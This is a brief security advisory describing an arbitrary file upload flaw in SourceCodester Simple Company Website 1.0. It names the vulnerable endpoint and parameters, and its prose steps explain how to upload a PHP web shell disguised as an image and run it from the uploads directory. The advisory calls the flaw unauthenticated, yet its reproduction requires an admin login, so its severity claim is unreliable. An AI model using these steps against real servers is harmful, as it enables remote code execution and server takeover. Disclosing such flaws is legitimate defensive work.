SourceCodester Simple Company Website Unrestricted File Upload Vulnerability

A critical arbitrary file upload vulnerability has been identified in SourceCodester Simple Company Website version 1.0. The issue resides in the file '/classes/SystemSettings.php' when the 'f' parameter is set to 'update_settings'. This vulnerability allows unauthenticated users to upload malicious PHP scripts disguised as image files. The lack of proper validation on file uploads enables these scripts to be executed via a web browser, potentially leading to a complete compromise of the server.

Impact

Exploitation of this vulnerability allows unauthenticated attackers to upload and execute arbitrary PHP code on the server. This could result in remote code execution, full system compromise, data leakage, unauthorized data modification, and disruption of service.

Reproduction

To reproduce this vulnerability, log into the application as an admin user. Once authenticated, send a POST request to '/classes/SystemSettings.php' with the 'f' parameter set to 'update_settings'. Include a file in the 'img' field that is actually a PHP web shell, but disguise it as an image by using an appropriate image MIME type. After the file is uploaded, it can be accessed and executed from the '/uploads/' directory.